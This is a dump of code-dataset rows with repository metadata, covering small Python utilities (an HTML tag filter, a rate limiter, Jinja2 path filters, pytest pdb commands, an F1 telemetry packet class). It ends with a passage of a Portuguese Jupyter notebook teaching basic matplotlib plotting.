                filtered_attrs and ' ' or '',
                ' '.join(['%s="%s"' % (k, v)
                for (k, v)
                in filtered_attrs.iteritems()]),
                tag_tail,
                '>'
                ])
    def handle_endtag(self, tag):
        """Emit a closing tag only if the tag is allowed and currently open."""
        if tag in self.allowed and self.open_tags[tag] > 0 \
           and tag not in self.non_closing:
            self.filtered_data.extend(['</', tag, '>'])
            self.open_tags[tag] -= 1
| 3,070 | 0 | 162 |
c07709071c9f9eaa1f7eed96069e6eb047c7e7ba | 1,280 | py | Python | tools/funcutils.py | dineshjoshi/cassandra-dtest-1 | 18ccbb4d308c27b67a8d81a2c849dc27fc3e2b5c | [
"Apache-2.0"
] | 52 | 2015-02-13T15:49:03.000Z | 2020-11-15T10:59:20.000Z | tools/funcutils.py | dineshjoshi/cassandra-dtest-1 | 18ccbb4d308c27b67a8d81a2c849dc27fc3e2b5c | [
"Apache-2.0"
] | 1,232 | 2015-01-05T19:31:26.000Z | 2020-06-07T02:59:43.000Z | tools/funcutils.py | dineshjoshi/cassandra-dtest-1 | 18ccbb4d308c27b67a8d81a2c849dc27fc3e2b5c | [
"Apache-2.0"
] | 105 | 2017-07-13T14:28:14.000Z | 2022-03-23T04:22:46.000Z | import time
class get_rate_limited_function(object):
"""
Close over a function and a time limit in seconds. The resulting object can
be called like the function, but will not delegate to the function if that
function was called through the object in the time limit.
Clients can ignore the time limit by calling the function directly as the
func attribute of the object.
"""
def merge_dicts(*dict_args):
"""
Given any number of dicts, shallow copy and merge into a new dict,
precedence goes to key value pairs in latter dicts.
"""
result = {}
for dictionary in dict_args:
result.update(dictionary)
return result
| 31.219512 | 90 | 0.645313 | import time
class get_rate_limited_function(object):
    """
    Wrap *func* so that calls made through this object are rate limited.
    The wrapper behaves like *func*, but silently returns ``None`` (without
    delegating) when invoked again within *limit* seconds of the previous
    successful delegation. Callers that want to bypass the limit can invoke
    the wrapped callable directly via the ``func`` attribute.
    """
    def __init__(self, func, limit):
        self.func = func
        self.limit = limit
        # False behaves as 0 in arithmetic, so the very first call always delegates.
        self.last_called = False
    def __call__(self, *args, **kwargs):
        now = time.time()
        if now - self.last_called < self.limit:
            # Still inside the rate-limit window: swallow the call.
            return None
        self.last_called = now
        return self.func(*args, **kwargs)
    def __repr__(self):
        return '%s(func=%s, limit=%s, last_called=%s)' % (
            self.__class__.__name__, self.func, self.limit, self.last_called)
def merge_dicts(*dict_args):
    """
    Shallow-merge any number of dicts into a brand-new dict.
    When the same key appears in several arguments, the value from the
    dict occurring latest in *dict_args* wins.
    """
    merged = {}
    for mapping in dict_args:
        merged.update(mapping)
    return merged
| 520 | 0 | 80 |
2ad4743e108cbde934ef319c28fa3ec378322843 | 780 | py | Python | jinja2_ospath/extensions.py | Midnighter/jinja2-ospath | 624aee8f552dd38d1eea97289e3ab194b105d843 | [
"BSD-3-Clause"
] | 6 | 2017-04-05T02:41:52.000Z | 2020-10-25T19:42:24.000Z | jinja2_ospath/extensions.py | Midnighter/jinja2-ospath | 624aee8f552dd38d1eea97289e3ab194b105d843 | [
"BSD-3-Clause"
] | null | null | null | jinja2_ospath/extensions.py | Midnighter/jinja2-ospath | 624aee8f552dd38d1eea97289e3ab194b105d843 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Extensions that introduce `basename` and `dirname` as Jinja2 filters.
Examples
--------
my_path = "/some/absolute/path/with/file.txt"
{{ my_path | basename }}
Will fill in `file.txt`.
"""
from __future__ import absolute_import
import os.path
from jinja2.ext import Extension
__all__ = ("OSPathExtension",)
class OSPathExtension(Extension):
"""A Jinja2 extension that introduces `os.path` functionality."""
tags = frozenset(["basename", "dirname", "abspath"])
def __init__(self, environment):
"""Initialize the extension and prepare the Jinja2 environment."""
super(OSPathExtension, self).__init__(environment)
for name in self.tags:
environment.filters[name] = getattr(os.path, name)
| 22.941176 | 74 | 0.675641 | # -*- coding: utf-8 -*-
"""
Extensions that introduce `basename` and `dirname` as Jinja2 filters.
Examples
--------
my_path = "/some/absolute/path/with/file.txt"
{{ my_path | basename }}
Will fill in `file.txt`.
"""
from __future__ import absolute_import
import os.path
from jinja2.ext import Extension
__all__ = ("OSPathExtension",)
class OSPathExtension(Extension):
    """A Jinja2 extension that introduces `os.path` functionality."""
    # Filter names to expose; each maps 1:1 onto the os.path function
    # of the same name (e.g. {{ path | basename }} -> os.path.basename).
    tags = frozenset(["basename", "dirname", "abspath"])
    def __init__(self, environment):
        """Initialize the extension and prepare the Jinja2 environment."""
        super(OSPathExtension, self).__init__(environment)
        # Register each os.path function as a template filter.
        for name in self.tags:
            environment.filters[name] = getattr(os.path, name)
| 0 | 0 | 0 |
3f7a9a00e6eb0b0cea9311cfb15837a64aaa0513 | 4,190 | py | Python | pytest_pdb.py | fschulze/pytest-pdb | 88bb88a20c6e69ec4e3da4a2d6cabac9cfb2cd86 | [
"MIT"
] | 9 | 2016-07-09T12:22:57.000Z | 2019-11-11T17:50:38.000Z | pytest_pdb.py | fschulze/pytest-pdb | 88bb88a20c6e69ec4e3da4a2d6cabac9cfb2cd86 | [
"MIT"
] | 9 | 2016-08-23T18:38:28.000Z | 2019-10-21T07:14:27.000Z | pytest_pdb.py | fschulze/pytest-pdb | 88bb88a20c6e69ec4e3da4a2d6cabac9cfb2cd86 | [
"MIT"
] | 1 | 2017-01-16T17:55:52.000Z | 2017-01-16T17:55:52.000Z | from __future__ import print_function
import pdb
import pytest
import sys
| 28.120805 | 74 | 0.583055 | from __future__ import print_function
import pdb
import pytest
import sys
def find_test_by_frame(currentframe):
    """Walk outward from *currentframe* looking for a pytest.Item in frame locals.
    Returns (item, frame) where *frame* is the frame examined just before the
    one holding the item (i.e. the frame one step closer to *currentframe*),
    or (None, currentframe) when no test item is found anywhere up the stack.
    """
    frame = currentframe
    prev = frame
    while frame:
        for value in frame.f_locals.values():
            if isinstance(value, pytest.Item):
                return (value, prev)
        prev = frame
        frame = frame.f_back
    return (None, currentframe)
def find_test_by_stack(stack):
    """Scan a pdb-style stack (list of (frame, lineno) pairs) for a pytest.Item.
    Scans newest-to-oldest and returns (item, frame, index) where *frame* and
    *index* refer to the stack entry just above the one holding the item.
    NOTE(review): on failure this returns (None, stack[0], 0) — stack[0] is a
    (frame, lineno) tuple, not a frame. Callers in this module bail out when
    item is None before using the frame, so the mismatch is latent; confirm
    before relying on the fallback frame value.
    """
    for index, (frame, lineno) in reversed(list(enumerate(stack))):
        for value in frame.f_locals.values():
            if isinstance(value, pytest.Item):
                return (value, stack[index + 1][0], index + 1)
    return (None, stack[0], 0)
def find_settrace_frame(curframe):
    """Return the caller of the nearest enclosing ``set_trace`` frame.
    Walks outward from *curframe*; when a frame whose code object is named
    'set_trace' is found, its caller (f_back) is returned — i.e. the user
    frame where the debugger was entered. Returns None implicitly when no
    such frame exists.
    """
    frame = curframe
    while frame:
        if frame.f_code.co_name == 'set_trace':
            if frame.f_back:
                return frame.f_back
        frame = frame.f_back
def offset_between_frames(currentframe, destinationframe):
    """Return the signed frame distance from *currentframe* to *destinationframe*.
    Negative when the destination is reachable by following f_back from the
    current frame, positive when the current frame is reachable from the
    destination, 0 when they are the same frame, and None when the frames
    are unrelated.
    """
    def _scan(start, target, step):
        # Walk the f_back chain from *start*, accumulating *step* per hop.
        distance = 0
        frame = start
        while frame:
            if frame == target:
                return distance
            distance += step
            frame = frame.f_back
        return None
    forward = _scan(currentframe, destinationframe, -1)
    if forward is not None:
        return forward
    return _scan(destinationframe, currentframe, +1)
def offset_description(offset):
    """Describe a signed frame offset in plain English (e.g. '2 frames above')."""
    if offset == 0:
        return 'at current frame'
    count = abs(offset)
    noun = 'frame' if count == 1 else 'frames'
    direction = 'above' if offset > 0 else 'below'
    return '%s %s %s' % (count, noun, direction)
class PdbExtension:
    """Mixin of extra pdb commands, grafted onto pdb.Pdb by pytest_configure.
    Methods rely on pdb.Pdb internals (self.stack, self.curindex,
    self._select_frame, self.error, self.stdout). The do_* docstrings double
    as pdb's interactive help text, so they are left untouched.
    """
    def do_whichtest(self, arg):
        """whichtest | wt
        Show which test we are currently in.
        """
        (test, frame, index) = find_test_by_stack(self.stack)
        if test is None:
            print("Couldn't determine current test", file=self.stdout)
            return
        # Offset of the test's frame relative to the frame pdb is focused on.
        offset = index - self.curindex
        print("Currently in {} ({}:{}) on line {} ({})".format(
            test.location[2], test.location[0], test.location[1] + 1,
            frame.f_lineno, offset_description(offset)), file=self.stdout)
    do_wt = do_whichtest
    def do_gototest(self, arg):
        """gototest | gt
        Go to frame containing the current test.
        """
        (test, frame, index) = find_test_by_stack(self.stack)
        if test is None:
            print("Couldn't determine current test.", file=self.stdout)
            return
        self._select_frame(index)
    do_gt = do_gototest
    def do_top(self, arg):
        """top
        Move to top (oldest) frame.
        """
        if self.curindex == 0:
            self.error('Oldest frame')
            return
        self._select_frame(0)
    def do_bottom(self, arg):
        """bottom
        Move to bottom (newest) frame.
        """
        if self.curindex + 1 == len(self.stack):
            self.error('Newest frame')
            return
        self._select_frame(len(self.stack) - 1)
def pytest_configure(config):
    """Pytest hook: monkey-patch PdbExtension's commands onto pdb.Pdb.
    First verifies that no do_*/help_* attribute we are about to add already
    exists on pdb.Pdb (guarding against clobbering a stdlib or other plugin's
    command), then copies each available attribute over.
    """
    # Command names, derived from PdbExtension's do_* methods.
    cmds = {x[3:] for x in dir(PdbExtension) if x.startswith('do_')}
    prefixes = {'do', 'help'}
    for prefix in prefixes:
        for cmd in cmds:
            attr = '%s_%s' % (prefix, cmd)
            if hasattr(pdb.Pdb, attr):
                # NOTE(review): bare ValueError with no message — naming the
                # conflicting attribute would aid debugging.
                raise ValueError
    for prefix in prefixes:
        for cmd in cmds:
            attr = '%s_%s' % (prefix, cmd)
            if hasattr(PdbExtension, attr):
                setattr(pdb.Pdb, attr, getattr(PdbExtension, attr))
def pytest_enter_pdb(config):
    """Pytest hook: print a banner naming the current test when pdb is entered.
    Shows the test id, its file:line, the current line, and (when computable)
    how many frames separate the set_trace() call site from the test frame.
    """
    # Local import: _pytest internals are only needed when pdb actually starts.
    import _pytest.config
    tw = _pytest.config.create_terminal_writer(config)
    # f_back skips this hook's own frame.
    curframe = sys._getframe().f_back
    (test, frame) = find_test_by_frame(curframe)
    if test is None:
        tw.sep(">", "Couldn't determine current test")
        return
    offset = offset_between_frames(find_settrace_frame(curframe), frame)
    desc = ''
    if offset is not None:
        desc = ' (%s)' % offset_description(offset)
    tw.sep(">", "Currently in {} ({}:{}) on line {}{}".format(
        test.location[2], test.location[0], test.location[1] + 1,
        frame.f_lineno, desc))
| 2,537 | 1,387 | 184 |
90202dc319205aa9dfe44731814dba7ab2969a14 | 517 | py | Python | pct_python_default_test/pct_python_default_test.py | bitranox/pct_python_default_test | 1220b36c2fbc345fcabc43f0b9934db8415f682c | [
"MIT"
] | null | null | null | pct_python_default_test/pct_python_default_test.py | bitranox/pct_python_default_test | 1220b36c2fbc345fcabc43f0b9934db8415f682c | [
"MIT"
] | 1 | 2020-07-16T21:52:39.000Z | 2020-07-16T21:52:39.000Z | pct_python_default_test/pct_python_default_test.py | bitranox/pct_python_default_test | 1220b36c2fbc345fcabc43f0b9934db8415f682c | [
"MIT"
] | null | null | null | # STDLIB
import sys
# main{{{
def main() -> None:
"""
the main method, prints hello world
Parameter
----------
none
none
Result
----------
none
Exceptions
----------
none
Examples
----------
>>> main()
Hello World - by PizzaCutter
"""
# main}}}
print("Hello World - by PizzaCutter")
if __name__ == "__main__":
print(b'this is a library only, the executable is named "pct_python_default_test_cli.py"', file=sys.stderr)
| 12.609756 | 111 | 0.524178 | # STDLIB
import sys
# main{{{
def main() -> None:
    """
    Print the hello-world greeting produced by this library.
    Parameter
    ----------
    none
    Result
    ----------
    none
    Exceptions
    ----------
    none
    Examples
    ----------
    >>> main()
    Hello World - by PizzaCutter
    """
    # main}}}
    greeting = "Hello World - by PizzaCutter"
    print(greeting)
if __name__ == "__main__":
    # Fix: the message was a bytes literal, so print() emitted its repr
    # (with a leading b'...') instead of the intended text. Use a str literal.
    print('this is a library only, the executable is named "pct_python_default_test_cli.py"', file=sys.stderr)
| 0 | 0 | 0 |
0bb859a0f09642ca495e7ada8a843bbeabd7c425 | 1,354 | py | Python | receiver/f12021/packets/base.py | f1laps/f1laps-telemetry | 0c264f9300d58397fe2f8b3018cd2e9151e28d08 | [
"MIT"
] | 3 | 2021-02-23T22:06:13.000Z | 2022-02-06T15:05:56.000Z | receiver/f12021/packets/base.py | f1laps/f1laps-telemetry | 0c264f9300d58397fe2f8b3018cd2e9151e28d08 | [
"MIT"
] | null | null | null | receiver/f12021/packets/base.py | f1laps/f1laps-telemetry | 0c264f9300d58397fe2f8b3018cd2e9151e28d08 | [
"MIT"
] | null | null | null | import ctypes
from lib.logger import log
from receiver.game_version import CrossGamePacketHeader
class PacketHeader(CrossGamePacketHeader):
"""
The Packet Header is the same across F12020 and F12021
Hence we use one shared HeaderClass for now
May have to upgrade that logic if it changes
"""
pass | 32.238095 | 113 | 0.585672 | import ctypes
from lib.logger import log
from receiver.game_version import CrossGamePacketHeader
class PacketBase(ctypes.LittleEndianStructure):
    """Common base for F1 2021 UDP telemetry packet structures.
    Subclasses declare their binary layout via ctypes ``_fields_``; packets
    are little-endian and packed with no padding (_pack_ = 1).
    """
    _pack_ = 1
    # Whether receiving this packet type should create a new session object;
    # subclasses override when applicable.
    creates_session_object = False
    def process(self, session):
        # Default no-op: log and hand the session back unchanged. Subclasses
        # that carry actionable data override process().
        log.debug("Skipping incoming %s because it doesn't have a '.process()' method" % self.__class__.__name__)
        return session
    def __repr__(self):
        """ Custom repr method """
        # Render every declared ctypes field as name=value; nested structures
        # and scalars use repr(), arrays are expanded element by element.
        fstr_list = []
        for field in self._fields_:
            fname = field[0]
            value = getattr(self, fname)
            if isinstance(
                value, (ctypes.LittleEndianStructure, int, float, bytes)
            ):
                vstr = repr(value)
            elif isinstance(value, ctypes.Array):
                vstr = "[{}]".format(", ".join(repr(e) for e in value))
            else:
                # Unexpected field type: fail loudly rather than misrender.
                raise RuntimeError(
                    "Bad value {!r} of type {!r}".format(value, type(value))
                )
            fstr = f"{fname}={vstr}"
            fstr_list.append(fstr)
        return "{}({})".format(self.__class__.__name__, ", ".join(fstr_list))
# Thin alias: the header layout lives in CrossGamePacketHeader.
class PacketHeader(CrossGamePacketHeader):
    """
    The Packet Header is the same across F12020 and F12021
    Hence we use one shared HeaderClass for now
    May have to upgrade that logic if it changes
    """
    pass
b9598b4ab45217317e00c390d5206308d71afa14 | 18,121 | py | Python | _build/jupyter_execute/ipynb/04b-plotagem-matplotlib.py | gcpeixoto/FMECD | 9bca72574c6630d1594396fffef31cfb8d58dec2 | [
"CC0-1.0"
] | null | null | null | _build/jupyter_execute/ipynb/04b-plotagem-matplotlib.py | gcpeixoto/FMECD | 9bca72574c6630d1594396fffef31cfb8d58dec2 | [
"CC0-1.0"
] | null | null | null | _build/jupyter_execute/ipynb/04b-plotagem-matplotlib.py | gcpeixoto/FMECD | 9bca72574c6630d1594396fffef31cfb8d58dec2 | [
"CC0-1.0"
] | null | null | null | # Plotagem básica com _matplotlib_
## Visualização de dados
A visualização de dados é um campo do conhecimento bastante antigo que foi trazido à mostra muito recentemente com a expansão do "Big Data". Seu principal objetivo é representar dados e informações graficamente por meio de elementos visuais como tabelas, gráficos, mapas e infográficos. Diversas ferramentas estão disponíveis para tornar a interpretação de dados mais clara, compreensível e acessível.
No contexto da análise de dados, a visualização de dados é um componente fundamental para a criação de relatórios de negócios, painéis de instrumentos (_dashboards_) e gráficos multidimensionais que são aplicáveis às mais diversas disciplinas, tais como Economia, Ciência Política e, principalmente, todo o núcleo de ciências exatas (Matemática, Estatística e Computação).
Em seu livro _The Visual Display of Quantitative Information_, [[Edward Tufte]](https://www.edwardtufte.com/tufte/), conhecido como o guru do _design_ aplicado à visualização de dados, afirma que, a cada ano, o mundo produz algo entre 900 bilhões e 2 trilhões de imagens impressas de gráficos. Ele destaca que o _design_ de um gráfico estatístico, por exemplo, é uma matéria universal similar à Matemática e não está atrelado a características únicas de uma linguagem particular. Portanto, aprender visualização de dados para comunicar dados com eficiência é tão importante quanto aprender a Língua Portuguesa para escrever melhor.
Você pode ver uma lista sugestiva de bons blogues e livros sobre visualização de dados nas páginas de aprendizagem do software Tableau [[TabelauBlogs]](https://www.tableau.com/learn/articles/best-data-visualization-blogs), [[TabelauBooks]](https://www.tableau.com/learn/articles/books-about-data-visualization).
## _Data storytelling_
_Data Storytelling_ é o processo de "contar histórias através dos dados". [[Cole Knaflic]](http://www.storytellingwithdata.com), uma engenheira de dados do Google, ao perceber como a quantidade de informação produzida no mundo às vezes é muito mal lida e comunicada, escreveu dois *best-sellers* sobre este tema a fim de ajudar pessoas a comunicarem melhor seus dados e produtos quantitativos. Ela argumenta em seu livro *Storytelling with Data: A Data Visualization Guide for Business Professionals* (*Storytelling com Dados: um Guia Sobre Visualização de Dados Para Profissionais de Negócios*, na versão em português) que não somos inerentemente bons para "contar uma história" através dos dados. Cole mostra com poucas lições o que devemos aprender para atingir uma comunicação eficiente por meio da visualização de dados.
## Plotagem matemática
_Plotagem_ é o termo comumente empregado para o esboço de gráficos de funções matemáticas via computador. Plotar gráficos é uma das tarefas que você mais realizará como futuro(a) cientista ou analista de dados. Nesta aula, nós introduziremos você ao universo da plotagem de gráficos em duas dimensões e ensinar como você pode visualizar dados facilmente com a biblioteca *matplotlib*. Daremos uma visão geral principalmente sobre a plotagem de funções matemáticas utilizando *arrays* e recursos de computação vetorizada com *numpy* já aprendidos. Ao longo do curso, você aprenderá a fazer plotagens mais interessantes de cunho estatístico.
## A biblioteca *matplotlib*
*Matplotlib* é a biblioteca Python mais conhecida para plotagem 2D (bidimensional) de *arrays*. Sua filosofia é simples: criar plotagens simples com apenas alguns comandos, ou apenas um. John Hunter [[History]](https://matplotlib.org/users/history.html), falecido em 2012, foi o autor desta biblioteca. Em 2008, ele escreveu que, enquanto buscava uma solução em Python para plotagem 2D, ele gostaria de ter, entre outras coisas:
- gráficos bonitos com pronta qualidade para publicação;
- capacidade de incorporação em interfaces gráficas para desenvolvimento de aplicações;
- um código fácil de entender e de manusear.
O *matplotlib* é um código dividido em três partes:
1. A interface *pylab*: um conjunto de funções predefinidas no submódulo `matplotlib.pyplot`.
2. O *frontend*: um conjunto de classes responsáveis pela criação de figuras, textos, linhas, gráficos etc. No *frontend*, todos os elementos gráficos são objetos ainda abstratos.
3. O *backend*: um conjunto de renderizadores responsáveis por converter os gráficos para dispositivos onde eles podem ser, de fato, visualizados. A [[renderização]](https://pt.wikipedia.org/wiki/Renderização) é o produto final do processamento digital. Por exemplo, o *backend* PS é responsável pela renderização de [[PostScript]](https://www.adobe.com/br/products/postscript.html). Já o *backend* SVG constrói gráficos vetoriais escaláveis ([[Scalable Vector Graphics]](https://www.w3.org/Graphics/SVG/)).
Veja o conceito de [[Canvas]](https://en.wikipedia.org/wiki/Canvas_(GUI)).
### Sessões interativas do *matplotlib*
Sessões interativas do *matplotlib* são habilitadas através de um [[comando mágico]](https://ipython.readthedocs.io/en/stable/interactive/magics.html):
- Em consoles, use `%matplotlib`;
- No Jupyter notebook, use `%matplotlib inline`.
Lembre que na aula anterior usamos o comando mágico `%timeit` para temporizar operações.
Para usar plenamente o matplotlib nesta aula, vamos usar:
```python
%matplotlib inline
from matplotlib import pyplot as plt
```
A segunda instrução também pode ser feita como
```python
import matplotlib.pyplot as plt
```
em que `plt` é um *alias* já padronizado.
# chamada padrão
%matplotlib inline
import matplotlib.pyplot as plt
## Criação de plots simples
Vamos importar o *numpy* para usarmos os benefícios da computação vetorizada e plotar nossos primeiros exemplos.
import numpy as np
x = np.linspace(-10,10,50)
y = x
plt.plot(x,y); # reta y = x
**Exemplo:** plote o gráfico da parábola $f(x) = ax^2 + bx + c$ para valores quaisquer de $a,b,c$ no intervalo $-20 \leq x \leq 20$.
x = np.linspace(-20,20,50)
a,b,c = 2,3,4
y = a*x**2 + b*x + c # f(x)
plt.plot(x,y);
Podemos definir uma função para plotar a parábola:
def plota_parabola(a, b, c):
    """Plot the parabola f(x) = a*x**2 + b*x + c over -20 <= x <= 20.

    Args:
        a, b, c: real coefficients of the quadratic.
    """
    # The exercise asks for the interval [-20, 20]; the original code used
    # 21 as the right endpoint, which looks like a typo (the standalone
    # example above uses np.linspace(-20, 20, 50)).
    x = np.linspace(-20, 20, 50)
    y = a*x**2 + b*x + c
    plt.plot(x, y)
Agora podemos estudar o que cada coeficiente faz:
# mude o valor de a e considere b = 2, c = 1
for a in np.linspace(-2,3,10):
plota_parabola(a,2,1)
# mude o valor de b e considere a = 2, c = 1
for b in np.linspace(-2,3,20):
plota_parabola(2,b,1)
# mude o valor de c e considere a = 2, b = 1
for c in np.linspace(-2,3,10):
plota_parabola(2,1,c) # por que você não vê muitas mudanças?
# mude o valor de a, b e c
valores = np.linspace(-2,3,5)
for a in valores:
for b in valores:
for c in valores:
plota_parabola(a,b,c)
**Exemplo:** plote o gráfico da função $g(t) = a\cos(bt + \pi)$ para valores quaisquer de $a$ e $b$ no intervalo $0 \leq t \leq 2\pi$.
t = np.linspace(0,2*np.pi,50,endpoint=True) # t: ângulo
a, b = 1, 1
plt.plot(t,a*np.cos(b*t + np.pi));
b = 2
plt.plot(t,a*np.cos(b*t + np.pi));
b = 3
plt.plot(t,a*np.cos(b*t + np.pi));
As cores e marcações no gráfico são todas padronizadas. Vejamos como alterar tudo isto.
## Alteração de propriedades e estilos de linhas
Altere:
- cores com `color` ou `c`,
- espessura de linha com `linewidth` ou `lw`
- estilo de linha com `linestyle` ou `ls`
- tipo de símbolo marcador com `marker`
- largura de borda do símbolo marcador com `markeredgewidth` ou `mew`
- cor de borda do símbolo marcador com `markeredgecolor` ou `mec`
- cor de face do símbolo marcador com `markerfacecolor` ou `mfc`
- transparência com `alpha` no intervalo [0,1]
g = lambda a,b: a*np.cos(b*t + np.pi) # assume t anterior
# estude cada exemplo
# a ordem do 3o. argumento em diante pode mudar
plt.plot(t,g(1,1),color='c',linewidth=5,linestyle='-.',alpha=.3)
plt.plot(t,g(1,2),c='g',ls='-',lw='.7',marker='s',mfc='y',ms=8)
plt.plot(t,g(1,3),c='#e26d5a',ls=':', marker='d',mec='k',mew=2.0);
Cores e estilo de linha podem ser especificados de modo reduzido e em ordens distintas usando um especificador de formato.
plt.plot(t,g(1,1),'yv') # amarelo; triângulo para baixo;
plt.plot(t,g(1,2),':c+') # pontilhado; ciano; cruz;
plt.plot(t,-g(2,2),'>-.r'); # triangulo direita; traço-ponto; vermelho;
### Plotagem múltipla
O exemplo acima poderia ser feito como plotagem múltipla em 3 blocos do tipo (`x,y,'fmt')`, onde `x` e `y` são as informações dos eixos coordenados e `fmt` é uma string de formatação.
plt.plot(t,g(1,1),'yv', t,g(1,2),':c+', t,-g(2,2),'>-.r'); # 3 blocos sequenciados
Para verificar todas as opções de propriedades e estilos de linhas, veja `plt.plot?`.
### Especificação de figuras
Use `plt.figure` para criar um ambiente de figura e altere:
- a largura e altura (em polegadas) com `figsize = (largura,altura)`. O padrão é (6.4,4.8).
- a resolução (em pontos por polegadas) com `dpi`. O padrão é 100.
- a cor de fundo (*background*) com `facecolor`. O padrão é `w` (branco).
**Exemplo:** Plote os gráficos de $h_1(x) = a\sqrt{x}$ e $h_2(x) = be^{\frac{x}{c}}$ para valores de a,b,c e propriedades acima livres.
x = np.linspace(0,10,50,endpoint=True)
h1, h2 = lambda a: a*np.sqrt(x), lambda b,c: b*np.exp(x/c)
plt.figure(figsize=(8,6), dpi=200, facecolor='#e0eeee')
plt.plot(x,h1(.9),x,h2(1,9));
### Alterando limites e marcações de eixos
Altere:
- o intervalo do eixo `x` com `xlim`
- o intervalo do eixo `y` com `ylim`
- as marcações do eixo `x` com `xticks`
- as marcações do eixo `y` com `yticks`
plt.plot(x,h1(.9),x,h2(1,9)); plt.xlim(1.6,9.2); plt.ylim(1.0,2.8);
plt.figure(figsize=(10,8))
plt.plot(t,g(1,3),c=[0.1,0.4,0.5],marker='s',mfc='w',mew=2.0);
plt.plot(t,g(1.2,2),c=[1.0,0.5,0.0],ls='--',marker='>',mfc='c',mew=1.0,ms=10);
plt.xticks([0, np.pi/2,np.pi,3*np.pi/2,2*np.pi]); # lista de múltiplos de pi
plt.yticks([-1, 0, 1]); # 3 valores em y
### Especificando texto de marcações em eixos
Podemos alterar as marcações das `ticks` passando um texto indicativo. No caso anterior, seria melhor algo como:
plt.figure(figsize=(10,8))
plt.plot(t,g(1,3),c=[0.1,0.4,0.5],marker='s',mfc='w',mew=2.0);
plt.plot(t,g(1.2,2),c=[1.0,0.5,0.0],ls='--',marker='>',mfc='c',mew=1.0,ms=10);
# o par de $...$ formata os números na linguagem TeX
plt.xticks([0, np.pi/2,np.pi,3*np.pi/2,2*np.pi], ['$0$','$\pi/2$','$\pi$','$3/2\pi$','$2\pi$']);
plt.yticks([-1, 0, 1], ['$y = -1$', '$y = 0$', '$y = +1$']);
### Deslocamento de eixos principais
Os eixos principais podem ser movidos para outras posições arbitrárias e as bordas da área de plotagem desligadas usando `spine`.
# plotagem da função
x = np.linspace(-3,3)
plt.plot(x,x**1/2*np.sin(x)-0.5); # f(x) = √x*sen(x) - 1/2
ax = plt.gca()
ax.spines['right'].set_color('none') # remove borda direita
ax.spines['top'].set_color('none') # remove borda superior
ax.spines['bottom'].set_position(('data',0)) # desloca eixo para x = 0
ax.spines['left'].set_position(('data',0)) # desloca eixo para y = 0
ax.xaxis.set_ticks_position('top') # desloca marcações para cima
ax.yaxis.set_ticks_position('right') # desloca marcações para a direita
plt.xticks([-2,0,2]) # altera ticks de x
ax.set_xticklabels(['esq.','zero','dir.']) # altera ticklabels de x
plt.yticks([-0.4,0,0.4]) # altera ticks de y
ax.set_yticklabels(['sup.','zero','inf.']); # altera ticklabels de y
### Inserção de legendas
Para criarmos:
- uma legenda para os gráficos, usamos `legend`.
- uma legenda para o eixo x, usamos `xlabel`
- uma legenda para o eixo y, usamos `ylabel`
- um título para o gráfico, usamos `title`
**Exemplo:** plote o gráfico da reta $f_1(x) = x + 1$ e da reta $f_2(x) = 1 - x$ e adicione uma legenda com cores azul e laranja.
plt.plot(x, x + 1,'-b', label = 'y = x + 1' )
plt.plot(x, 1-x, c = [1.0,0.5,0.0], label = 'y = 1 - x'); # laranja: 100% de vermelho, 50% verde
plt.legend(loc = 'best') # 'loc=best' : melhor localização da legenda
plt.xlabel('x'); plt.ylabel('y'); plt.title('Gráfico de duas retas');
#### Localização de legendas
Use `loc=valor` para especificar onde posicionar a legenda. Use `plt.legend?` para verificar as posições disponíveis para `valor`. Vide tabela de valores `Location String` e `Location Code`.
plt.plot(np.nan,np.nan,label='upper right'); # nan : not a number
plt.legend(loc=1); # usando número
plt.plot(np.nan,np.nan,label='loc=1');
plt.legend(loc='upper right'); # usando a string correspondente
### Alteração de tamanho de fonte
Para alterar o tamanho da fonte de legendas, use `fontsize`.
plt.plot(np.nan,np.nan,label='legenda');
FSx, FSy, FSleg, FStit = 10, 20, 30, 40
plt.xlabel('Eixo x',c='b', fontsize=FSx)
plt.ylabel('Eixo y',c='g', fontsize=FSy)
plt.legend(loc='center', fontsize=FSleg);
plt.title('Título', c='c', fontsize=FStit);
### Anotações simples
Podemos incluir anotações em gráficos com a função `annotate(texto,xref,yref)`
plt.plot(np.nan,np.nan);
plt.annotate('P (0.5,0.5)',(0.5,0.5));
plt.annotate('Q (0.1,0.8)',(0.1,0.8));
**Exemplo**: gere um conjunto de 10 pontos $(x,y)$ aleatórios em que $0.2 < x,y < 0.8$ e anote-os no plano.
# gera uma lista de 10 pontos satisfazendo a condição
P = []
while len(P) != 10:
xy = np.round(np.random.rand(2),1)
test = np.all( (xy > 0.2) & (xy < 0.8) )
if test:
P.append(tuple(xy))
# plota o plano
plt.figure(figsize=(8,8))
plt.xlim(0,1)
plt.ylim(0,1)
for ponto in P:
plt.plot(ponto[0],ponto[1],'o')
plt.annotate(f'({ponto[0]},{ponto[1]})',ponto,fontsize=14)
**Problema:** o código acima tem um problema. Verifique que `len(P) = 10`, mas ele não plota os 10 pontos como gostaríamos de ver. Descubra o que está acontecendo e proponha uma solução.
## Multiplotagem e eixos
No matplotlib, podemos trabalhar com a função `subplot(m,n,p)` para criar múltiplas figuras e eixos independentes como se cada figura fosse um elemento de uma grande "matriz de figuras" de `m` linhas e `n` colunas, enquanto `p` é o índice da figura (este valor será no máximo o produto `mxn`). A função funciona da seguinte forma.
- Exemplo 1: suponha que você queira criar 3 figuras e dispô-las em uma única linha. Neste caso, `m = 1`, `n = 3` e `p` variará de 1 a 3, visto que `mxn = 3`.
- Exemplo 2: suponha que você queira criar 6 figuras e dispô-las em 2 linhas e 3 colunas. Neste caso, `m = 2`, `n = 3` e `p` variará de 1 a 6, visto que `mxn = 6`.
- Exemplo 3: suponha que você queira criar 12 figuras e dispô-las em 4 linhas e 3 colunas. Neste caso, `m = 4`, `n = 3` e `p` variará de 1 a 12, visto que `mxn = 12`.
Cada plotagem possui seu eixo independentemente da outra.
**Exemplo 1:** gráfico de 1 reta, 1 parábola e 1 polinômio cúbico lado a lado.
x = np.linspace(-5,5,20)
plt.figure(figsize=(15,4))
# aqui p = 1
plt.subplot(1,3,1) # plt.subplot(131) também é válida
plt.plot(x,2*x-1,c='r',marker='^')
plt.title('$y=2x-1$')
# aqui p = 2
plt.subplot(1,3,2) # plt.subplot(132) também é válida
plt.plot(x,3*x**2 - 2*x - 1,c='g',marker='o')
plt.title('$y=3x^2 - 2x - 1$')
# aqui p = 3
plt.subplot(1,3,3) # plt.subplot(133) também é válida
plt.plot(x,1/2*x**3 + 3*x**2 - 2*x - 1,c='b',marker='*')
